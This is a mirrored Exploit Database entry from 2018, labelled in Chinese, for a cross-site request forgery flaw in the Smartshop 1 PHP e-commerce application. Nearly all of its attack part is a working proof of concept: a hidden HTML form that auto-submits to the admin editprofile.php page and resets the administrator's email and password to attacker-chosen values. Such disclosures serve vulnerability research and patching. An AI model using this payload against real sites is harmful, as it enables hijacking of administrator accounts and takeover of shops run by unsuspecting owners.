Smartshop 1 – Cross-Site Request Forgery

• Exploit Database
• 104 阅读

• 作者： L0RD
  日期： 2018-06-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44824/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  # Exploit Title: Smartshop 1 - Cross site request forgery # Date: 2018-06-02 # Exploit Author: L0RD or borna.nematzadeh123@gmail.com # Software Link: https://github.com/smakosh/Smartshop/archive/master.zip # Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website # Version: 1 # Tested on: Kali linux =================================================   # POC : CSRF   # Exploit : # vulnerable file : editprofile.php   <html> <head> <title>Change admin password</title> </head> <body> <form method="POST" action="http://127.0.0.1/clone/Smartshop-master/admin/editprofile.php"> <input type="hidden" name="email" value="decode@test.com"> <input type="hidden" name="password" value="1234"> <input type="hidden" name="confirmation" value="1234"> </form> <script> document.forms[0].submit(); </script> </body> </html>   ==================================================